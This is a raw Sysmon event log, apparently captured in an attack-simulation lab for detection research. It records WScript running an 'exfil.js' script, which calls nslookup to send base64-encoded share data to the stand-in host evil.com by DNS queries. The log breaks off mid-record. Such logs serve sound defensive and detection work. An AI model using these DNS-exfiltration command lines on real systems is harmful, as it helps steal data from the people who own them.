14:16:37.132{2E1864BB-17C5-629A-0E41-000000005F02}39646072C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-0F41-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.132{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.132{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.132{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.132{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.130{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-0F41-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.129{2E1864BB-17C5-629A-0D41-000000005F02}64928036C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-0F41-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.129{2E1864BB-17C5-629A-0F41-000000005F02}2604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-0D41-000000005F02}6492C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbwjb.tmp 2>&1 10341000x8000000000000000201920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.094{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-0E41-000000005F02}3964C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.094{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-0E41-000000005F02}3964C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.094{2E1864BB-17C5-629A-0E41-000000005F02}39646072C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-0D41-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.079{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-0E41-000000005F02}3964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-0D41-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{2E1864BB-17A1-629A-783D-000000005F02}55526996C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-0D41-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.072{2E1864BB-17C5-629A-0D41-000000005F02}6492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbwjb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.047{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxafb.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-17C4-629A-0B41-000000005F02}77441736C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-0C41-000000005F02}2652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-0C41-000000005F02}2652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.009{2E1864BB-17C4-629A-0A41-000000005F02}62205228C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-0C41-000000005F02}2652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.016{2E1864BB-17C5-629A-0C41-000000005F02}2652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-0A41-000000005F02}6220C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxafb.tmp 2>&1 354300x800000000000000043947Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:34.644{0A5DF930-E35C-6299-1000-000000006002}932C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.243.179.10146.243.179.101.leadertelecom.ru6749-false10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal3389ms-wbt-server 23542300x800000000000000043946Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:37.062{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=383DC66068DD51F15468EE2EF59D5A28,SHA256=7060A1BA91B671999D8D6C4753E162741806676972B7E122F7559E0469B5869E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.985{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-5041-000000005F02}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 